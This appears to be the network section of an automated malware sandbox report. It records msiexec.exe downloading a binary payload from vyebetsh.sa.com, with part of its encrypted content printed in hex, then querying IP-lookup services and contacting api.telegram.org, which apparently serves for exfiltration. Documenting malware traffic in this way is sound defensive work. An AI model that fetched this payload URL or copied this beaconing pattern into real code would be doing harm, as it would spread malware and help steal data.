                                                                            Nov 4, 2024 07:13:46.800517082 CET44349852188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:46.838985920 CET4984680192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:47.413868904 CET44349852188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:47.415355921 CET49852443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:47.415384054 CET44349852188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:47.555288076 CET44349852188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:47.555392981 CET44349852188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:47.555464983 CET49852443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:47.555799961 CET49852443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:47.559201002 CET4984680192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:47.560134888 CET4985880192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:47.564512014 CET8049846193.122.6.168192.168.2.5
                                                                            Nov 4, 2024 07:13:47.564574003 CET4984680192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:47.564950943 CET8049858193.122.6.168192.168.2.5
                                                                            Nov 4, 2024 07:13:47.565109015 CET4985880192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:47.565109015 CET4985880192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:47.570159912 CET8049858193.122.6.168192.168.2.5
                                                                            Nov 4, 2024 07:13:48.409867048 CET8049858193.122.6.168192.168.2.5
                                                                            Nov 4, 2024 07:13:48.412636042 CET49864443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:48.412677050 CET44349864188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:48.413290977 CET49864443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:48.413557053 CET49864443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:48.413572073 CET44349864188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:48.463992119 CET4985880192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:49.010987043 CET44349864188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:49.021454096 CET49864443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:49.021483898 CET44349864188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:49.154922962 CET44349864188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:49.155015945 CET44349864188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:49.155059099 CET49864443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:49.155561924 CET49864443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:49.158934116 CET4985880192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:49.159987926 CET4987080192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:49.164163113 CET8049858193.122.6.168192.168.2.5
                                                                            Nov 4, 2024 07:13:49.164211988 CET4985880192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:49.164747000 CET8049870193.122.6.168192.168.2.5
                                                                            Nov 4, 2024 07:13:49.164797068 CET4987080192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:49.164886951 CET4987080192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:49.169598103 CET8049870193.122.6.168192.168.2.5
                                                                            Nov 4, 2024 07:13:50.006325960 CET8049870193.122.6.168192.168.2.5
                                                                            Nov 4, 2024 07:13:50.007395983 CET49876443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:50.007433891 CET44349876188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:50.007966042 CET49876443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:50.008183002 CET49876443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:50.008198977 CET44349876188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:50.057718992 CET4987080192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:50.623040915 CET44349876188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:50.624609947 CET49876443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:50.624622107 CET44349876188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:50.768378973 CET44349876188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:50.768470049 CET44349876188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:50.768573999 CET49876443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:50.768923044 CET49876443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:50.772080898 CET4987080192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:50.773164988 CET4988280192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:50.777376890 CET8049870193.122.6.168192.168.2.5
                                                                            Nov 4, 2024 07:13:50.777441025 CET4987080192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:50.777964115 CET8049882193.122.6.168192.168.2.5
                                                                            Nov 4, 2024 07:13:50.778034925 CET4988280192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:50.779438019 CET4988280192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:50.784198046 CET8049882193.122.6.168192.168.2.5
                                                                            Nov 4, 2024 07:13:51.623099089 CET8049882193.122.6.168192.168.2.5
                                                                            Nov 4, 2024 07:13:51.630346060 CET49887443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:51.630414963 CET44349887188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:51.630496979 CET49887443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:51.630717993 CET49887443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:51.630733013 CET44349887188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:51.667098999 CET4988280192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:52.235079050 CET44349887188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:52.239279032 CET49887443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:52.239382982 CET44349887188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:52.375549078 CET44349887188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:52.375657082 CET44349887188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:52.375718117 CET49887443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:52.376208067 CET49887443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:52.378973007 CET4988280192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:52.379472017 CET4988980192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:52.384125948 CET8049882193.122.6.168192.168.2.5
                                                                            Nov 4, 2024 07:13:52.384197950 CET4988280192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:52.384252071 CET8049889193.122.6.168192.168.2.5
                                                                            Nov 4, 2024 07:13:52.384432077 CET4988980192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:52.384509087 CET4988980192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:52.389270067 CET8049889193.122.6.168192.168.2.5
                                                                            Nov 4, 2024 07:13:53.210242987 CET8049889193.122.6.168192.168.2.5
                                                                            Nov 4, 2024 07:13:53.211431980 CET49895443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:53.211473942 CET44349895188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:53.211541891 CET49895443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:53.211735010 CET49895443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:53.211745024 CET44349895188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:53.260889053 CET4988980192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:53.810508966 CET44349895188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:53.812170982 CET49895443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:53.812216997 CET44349895188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:53.949580908 CET44349895188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:53.949709892 CET44349895188.114.96.3192.168.2.5
                                                                            Nov 4, 2024 07:13:53.949757099 CET49895443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:53.950110912 CET49895443192.168.2.5188.114.96.3
                                                                            Nov 4, 2024 07:13:53.971695900 CET4988980192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:53.976820946 CET8049889193.122.6.168192.168.2.5
                                                                            Nov 4, 2024 07:13:53.976878881 CET4988980192.168.2.5193.122.6.168
                                                                            Nov 4, 2024 07:13:53.978713989 CET49901443192.168.2.5149.154.167.220
                                                                            Nov 4, 2024 07:13:53.978760004 CET44349901149.154.167.220192.168.2.5
                                                                            Nov 4, 2024 07:13:53.978820086 CET49901443192.168.2.5149.154.167.220
                                                                            Nov 4, 2024 07:13:53.979142904 CET49901443192.168.2.5149.154.167.220
                                                                            Nov 4, 2024 07:13:53.979161978 CET44349901149.154.167.220192.168.2.5
                                                                            Nov 4, 2024 07:13:54.815295935 CET44349901149.154.167.220192.168.2.5
                                                                            Nov 4, 2024 07:13:54.815397978 CET49901443192.168.2.5149.154.167.220
                                                                            Nov 4, 2024 07:13:54.817580938 CET49901443192.168.2.5149.154.167.220
                                                                            Nov 4, 2024 07:13:54.817610025 CET44349901149.154.167.220192.168.2.5
                                                                            Nov 4, 2024 07:13:54.817847013 CET44349901149.154.167.220192.168.2.5
                                                                            Nov 4, 2024 07:13:54.819397926 CET49901443192.168.2.5149.154.167.220
                                                                            Nov 4, 2024 07:13:54.863337040 CET44349901149.154.167.220192.168.2.5
                                                                            Nov 4, 2024 07:13:55.080024004 CET44349901149.154.167.220192.168.2.5
                                                                            Nov 4, 2024 07:13:55.080090046 CET44349901149.154.167.220192.168.2.5
                                                                            Nov 4, 2024 07:13:55.080162048 CET49901443192.168.2.5149.154.167.220
                                                                            Nov 4, 2024 07:13:55.082576990 CET49901443192.168.2.5149.154.167.220
                                                                            Nov 4, 2024 07:14:00.713711023 CET4982580192.168.2.5193.122.6.168

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Nov 4, 2024 07:13:36.141813993 CET5473453192.168.2.51.1.1.1
                                                                            Nov 4, 2024 07:13:36.238181114 CET53547341.1.1.1192.168.2.5
                                                                            Nov 4, 2024 07:13:39.157991886 CET5442253192.168.2.51.1.1.1
                                                                            Nov 4, 2024 07:13:39.167100906 CET53544221.1.1.1192.168.2.5
                                                                            Nov 4, 2024 07:13:40.586250067 CET6460753192.168.2.51.1.1.1
                                                                            Nov 4, 2024 07:13:40.594244003 CET53646071.1.1.1192.168.2.5
                                                                            Nov 4, 2024 07:13:53.971621037 CET4924753192.168.2.51.1.1.1
                                                                            Nov 4, 2024 07:13:53.978249073 CET53492471.1.1.1192.168.2.5

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Nov 4, 2024 07:13:36.141813993 CET192.168.2.51.1.1.10x38cfStandard query (0)vyebetsh.sa.comA (IP address)IN (0x0001)false
                                                                            Nov 4, 2024 07:13:39.157991886 CET192.168.2.51.1.1.10xb6cdStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                            Nov 4, 2024 07:13:40.586250067 CET192.168.2.51.1.1.10x3b19Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                            Nov 4, 2024 07:13:53.971621037 CET192.168.2.51.1.1.10x97e4Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Nov 4, 2024 07:13:36.238181114 CET1.1.1.1192.168.2.50x38cfNo error (0)vyebetsh.sa.com141.98.10.40A (IP address)IN (0x0001)false
                                                                            Nov 4, 2024 07:13:39.167100906 CET1.1.1.1192.168.2.50xb6cdNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                            Nov 4, 2024 07:13:39.167100906 CET1.1.1.1192.168.2.50xb6cdNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                            Nov 4, 2024 07:13:39.167100906 CET1.1.1.1192.168.2.50xb6cdNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                            Nov 4, 2024 07:13:39.167100906 CET1.1.1.1192.168.2.50xb6cdNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                            Nov 4, 2024 07:13:39.167100906 CET1.1.1.1192.168.2.50xb6cdNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                            Nov 4, 2024 07:13:39.167100906 CET1.1.1.1192.168.2.50xb6cdNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                            Nov 4, 2024 07:13:40.594244003 CET1.1.1.1192.168.2.50x3b19No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                            Nov 4, 2024 07:13:40.594244003 CET1.1.1.1192.168.2.50x3b19No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                            Nov 4, 2024 07:13:53.978249073 CET1.1.1.1192.168.2.50x97e4No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                            HTTP Request Dependency Graph

                                                                            • reallyfreegeoip.org
                                                                            • api.telegram.org
                                                                            • vyebetsh.sa.com
                                                                            • checkip.dyndns.org

                                                                            HTTP Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.549787141.98.10.40801128C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 4, 2024 07:13:36.248771906 CET175OUTGET /nMcrGmhC252.bin HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                            Host: vyebetsh.sa.com
                                                                            Cache-Control: no-cache
                                                                            Nov 4, 2024 07:13:37.121876001 CET1236INHTTP/1.1 200 OK
                                                                            Date: Mon, 04 Nov 2024 06:13:36 GMT
                                                                            Server: Apache
                                                                            Last-Modified: Sun, 03 Nov 2024 23:42:54 GMT
                                                                            Accept-Ranges: bytes
                                                                            Content-Length: 275008
                                                                            Content-Type: application/octet-stream
                                                                            Data Raw: 88 13 7d 5b 16 ab d7 65 81 df 0b d4 53 30 68 5a 6c fd 43 c7 70 57 b5 57 c9 35 fe 9b 77 d8 5f cb bc cf 64 b6 66 ad 7d a7 92 68 32 a2 6e bc 75 6c 43 82 28 f3 a2 43 96 86 8e 1f eb 78 81 f9 3f 8b 66 de c7 02 f1 15 73 19 44 38 64 36 63 7f 7f 67 22 6a 96 24 15 36 a2 89 84 ee 78 06 e9 af 87 85 75 02 c3 0b 5a 8e dc 65 11 bf 81 47 5b 20 91 07 42 40 0c cf c5 b6 c4 42 89 b1 49 ff f1 9d e6 a1 32 51 f0 3e 72 f1 c6 8c d2 20 b9 0e a6 f7 14 c9 53 bd 54 95 5a ed 34 d5 29 cc c4 67 00 08 af 6a 0c 2c 4c fd 03 77 8e b0 df 50 77 ed 18 cd 5d b0 b7 6a 8b 96 bf 85 62 49 32 03 47 b7 37 13 5d f9 5d bb 1a b7 6b 2d 8c 51 63 b7 3e 29 64 f6 76 48 62 b6 64 a6 ff 4d 30 21 9a d3 a2 69 18 44 89 44 2e 5b 93 63 3d 7d 8b f6 73 99 f3 dd 1c 88 55 c4 83 50 97 62 fa 0d fc de 62 6d 8d a3 f7 30 53 54 60 1c 08 e7 c5 d0 8b fb e7 a9 65 ea 83 c8 06 bc 4c 05 e4 11 81 28 a4 77 fa 37 76 95 99 39 e3 08 07 94 44 30 c3 d4 d0 76 83 6c a3 5d a6 1b 53 03 5e bc 28 ef 19 33 f5 5a 4f 88 8e 6e 53 fc 5e 66 94 10 52 dc b3 26 3e 2c 75 16 49 93 cf 1b 2d e8 ee 89 [TRUNCATED]
                                                                            Data Ascii: }[eS0hZlCpWW5w_df}h2nulC(Cx?fsD8d6cg"j$6xuZeG[ B@BI2Q>r STZ4)gj,LwPw]jbI2G7]]k-Qc>)dvHbdM0!iDD.[c=}sUPbbm0ST`eL(w7v9D0vl]S^(3ZOnS^fR&>,uI-FLL$R&ahmwJ+G8_V;kBkiVXJf$x-5z,6YP1n~g;s[Az(FF;qaYv,JzLGm-?u5M^ R68AY?aLt[Z}9!\!nz&k_/vwS9 |v<p,%_Q'YBaFWDh{vJWY7r@tV=[2j^_W'XI*qE57W'$/|dGsi4]iOrM(N3XTe(StPL} }LZi6jzt]FT;8x63=SK7|%M=D#}f48RTWybACib+z{O 5l"o)IK-Q[GM1H]i_1VfNXd.dHV [TRUNCATED]
                                                                            Nov 4, 2024 07:13:37.121886969 CET212INData Raw: de 44 ef 6f 01 e3 56 23 71 e2 96 cd 87 ca 22 c1 dd 21 ac e5 9d 7e 89 df 34 86 b9 17 e9 93 77 68 e7 5b 68 6f dc 8e 8e c6 19 6e 92 c4 ae 7a 43 2d ff ba a8 84 05 47 dd 0c c4 26 84 ad ef 7e 76 e1 8d f9 d3 ea 9a b3 1c 74 a7 af 27 39 d8 86 f6 ae 6c 2d
                                                                            Data Ascii: DoV#q"!~4wh[honzC-G&~vt'9l-Lc"5*i[mK,49[|\ohF=lDmI6<Ndh0\fd:7E(eSZ> ,AjCB1Rn39!&GH
                                                                            Nov 4, 2024 07:13:37.121911049 CET1236INData Raw: 10 98 67 93 6b a6 1a a6 f6 ba 07 45 f7 f3 90 bb 52 f1 b6 e1 fa 60 ac 89 fb 53 a4 6e 53 9d 4e 92 d0 e8 83 f1 71 eb ac 80 76 8e 0d 88 91 e2 eb 31 b6 7c 4c 0d 84 55 01 8f 9b 73 19 44 12 42 34 e7 2c 7f 67 9e 41 96 0e 37 34 a1 f4 68 ee 78 02 c3 89 85
                                                                            Data Ascii: gkER`SnSNqv1|LUsDB4,gA74hxqG[ -dBwaikrH<J`p>`ABABGat,u3eM/Z-C&K'SOOd\n`I jeD*eaF>V7f+M2yv
                                                                            Nov 4, 2024 07:13:37.121918917 CET212INData Raw: ad 1a ac 8b 30 07 45 e2 f1 f8 cf d7 f1 b2 ef fb 46 aa a1 f8 3d 1b 6f 53 92 64 b4 d0 e5 80 8c f0 eb d2 8e 5c a8 09 80 b9 9f 7c 1b b6 6b 56 2a 84 5c 02 f2 15 7c 19 40 29 64 1e 82 80 7f 61 90 41 96 22 3f 36 b1 b9 c7 ee 10 02 e9 af 8f 85 75 13 b0 4e
                                                                            Data Ascii: 0EF=oSd\|kV*\|@)daA"?6uNZM3A[SBJ$BI{<HJC7EKBm3:~SHal)x(P@7\oC47W?'_Q8{dpHde ]XNwc;}
                                                                            Nov 4, 2024 07:13:37.121973038 CET1236INData Raw: f8 b3 ad a2 fd f5 26 a8 55 c2 83 63 d6 62 fa 07 94 e2 62 4d 8b a3 85 ab 53 54 14 9c 11 e7 c5 d4 f9 a1 e2 a9 15 6a 99 c8 06 b8 3f c3 e0 11 8b aa b8 77 fa 33 5e d2 9b 39 a9 0d 19 94 54 34 b1 98 d1 76 f3 ec ac 5d a6 0f 21 59 5f bc 58 6f 23 33 f5 5e
                                                                            Data Ascii: &UcbbMSTj?w3^9T4v]!Y_Xo#3^=n#|rf/$&NXVM/ztFH>&WRt$hLj}CNYUr8-/rT;noaiVRb/$rmF/7BZZ~
                                                                            Nov 4, 2024 07:13:37.122049093 CET212INData Raw: 8d 1c a8 5f ce fd 00 93 62 fe 06 bb f2 65 4a 8b cc a6 32 53 5e 66 9c 18 e7 c5 d4 f5 eb e3 a9 61 e1 84 e4 01 bb 4a ea b2 11 81 20 8e 64 ca 35 76 a1 9b 39 a3 9d 07 94 45 24 3d c2 ab 76 83 6a c0 0d a6 0b 59 09 20 ad 28 ef 0d 38 f2 76 48 8f 88 01 02
                                                                            Data Ascii: _beJ2S^faJ d5v9E$=vjY (8vH^lG"@=uVI'*}[FJ?$@!ykjPwX+@>V+hmBc!VR4u$|;
                                                                            Nov 4, 2024 07:13:37.122057915 CET1236INData Raw: ac bf 9f 0a 50 f1 15 de b9 0b 87 e2 0c a8 40 94 f4 96 11 d4 a2 ed b8 d2 0d 57 39 ad 47 aa cf fc ce c6 63 39 27 4b ce fe 15 3f 50 86 d6 46 ac d5 31 b1 77 61 8f 98 14 9f f9 f0 5e 70 d8 7d 4a a5 80 78 99 58 47 d8 69 53 e3 8f 93 f0 58 1d 7a b6 82 95
                                                                            Data Ascii: P@W9Gc9'K?PF1wa^p}JxXGiSXz'ZT%6>A_najLpxNZyt7\\Ez(&}b;p}wU9^jv8\C%_Q1]E%>+vZWX 6r|V;jQ8jI
                                                                            Nov 4, 2024 07:13:37.122066975 CET1236INData Raw: f1 11 aa a0 78 ee e6 07 a5 67 e1 9b 9a 7e f6 8a be b2 f8 14 74 3d bf 75 82 9b fc de cc 70 2f 21 b2 ba 23 12 3f 26 dd d3 46 ac d5 13 86 63 61 85 90 19 f7 a5 f7 59 7c c5 b6 40 a5 fa 08 7e 4b 47 a8 65 05 be 8f 93 fe 3c 6b 56 b1 8f 93 d1 e8 b2 ae 27
                                                                            Data Ascii: xg~t=up/!#?&FcaY|@~KGe<kV'cD".?RS;=hJptZn1sGp b vwC9vyq,y%_QHSBl$(#vYQJFsH~h2T_
                                                                            Nov 4, 2024 07:13:37.122076988 CET1236INData Raw: db e6 07 a5 03 03 f3 90 74 95 a7 fc b7 ee 0f 63 2d b3 5b 3b cf fc d4 c6 64 39 37 da 5a 7a 15 35 56 f2 9e 29 3f df 3b c5 63 66 e0 08 1f 98 df e4 5f 74 9f b9 4a a5 80 69 1e 64 c8 d8 6d 27 e6 89 82 f3 45 0b 51 3f ec fc 42 e5 c0 10 42 ea 13 d0 c3 a5
                                                                            Data Ascii: tc-[;d97Zz5V)?;cf_tJidm'EQ?BB7K5-*A6ZiAY?xMg6Y-} Ve;Ig){SS*v~SGp8,%N@",xJ1-7JWX4'~W:<
                                                                            Nov 4, 2024 07:13:37.122086048 CET636INData Raw: 93 f3 9a 72 81 d0 29 bc f8 6e 08 94 ad 73 a0 c2 8e 84 c7 63 58 20 b1 c1 15 a5 3f 56 ff 95 41 87 c7 2a c8 0c d0 8f 9c 15 ec aa f7 59 77 a4 24 5b ad e5 c8 19 4c 4d cb 69 2d e6 88 fc 47 53 1a 5c a2 8c 82 dd c8 1b c4 3a 8f 14 a5 dc a8 d1 01 c5 57 01
                                                                            Data Ascii: r)nscX ?VA*Yw$[LMi-GS\:W S78_iY5h0J^GZP1\VoR(cmc*v?wS9Sv6v:%_@[3W7AvaH,JWY"moP*1lQXt8X
                                                                            Nov 4, 2024 07:13:37.128184080 CET1236INData Raw: b3 ad 9a a2 18 0a 9c 02 27 3d ac b4 84 e4 66 5f 31 7a 99 13 87 c1 0a 88 9c ae 5b 0c b7 ba 70 30 55 6d f9 b4 49 2f 34 3f 5a ff 34 54 72 62 f7 98 af 76 e7 90 c5 40 9a e7 84 97 e9 72 34 46 be 53 41 8d 5c cd 41 e5 7b b5 df 3e 17 16 f2 f5 2b 2a f6 fc
                                                                            Data Ascii: '=f_1z[p0UmI/4?Z4Trbv@r4FSA\A{>+*JR:VJI7bITUT@-,Adi8?"^U+>"Uxv7wU)B3/DoSn?hz%P+]Y\8d4Vj$6x]ujY[


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.549804193.122.6.168801128C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 4, 2024 07:13:39.182477951 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Nov 4, 2024 07:13:40.020806074 CET323INHTTP/1.1 200 OK
                                                                            Date: Mon, 04 Nov 2024 06:13:39 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: df7ccbf0bccd074fa7aacd64e92998a6
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>
                                                                            Nov 4, 2024 07:13:40.023854971 CET127OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Nov 4, 2024 07:13:40.269002914 CET323INHTTP/1.1 200 OK
                                                                            Date: Mon, 04 Nov 2024 06:13:40 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: dd525812bc8ca693c77029e2da2e361a
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>
                                                                            Nov 4, 2024 07:13:40.500725031 CET323INHTTP/1.1 200 OK
                                                                            Date: Mon, 04 Nov 2024 06:13:40 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: dd525812bc8ca693c77029e2da2e361a
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>
                                                                            Nov 4, 2024 07:13:41.532917023 CET127OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Nov 4, 2024 07:13:41.780272961 CET323INHTTP/1.1 200 OK
                                                                            Date: Mon, 04 Nov 2024 06:13:41 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: eea125fce00d53547f07fd3860791703
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.549825193.122.6.168801128C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 4, 2024 07:13:42.535563946 CET127OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Nov 4, 2024 07:13:43.368520975 CET323INHTTP/1.1 200 OK
                                                                            Date: Mon, 04 Nov 2024 06:13:43 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: 8e61c9d38de0ea0d5f6a51beed6fd7db
